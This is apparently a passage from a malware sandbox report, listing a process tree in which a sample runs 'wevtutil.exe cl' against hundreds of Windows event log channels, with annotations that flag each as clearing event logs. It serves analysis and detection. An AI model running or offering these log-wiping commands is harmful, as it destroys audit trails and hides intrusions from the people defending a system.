C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Disk/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Documents/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EFS/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HAL/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Help/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKE/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Known Folders API Service"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MCT/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NTLM/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetShell/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Recovery/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sens/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Setup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StorPort/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/Main"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"3⤵
-
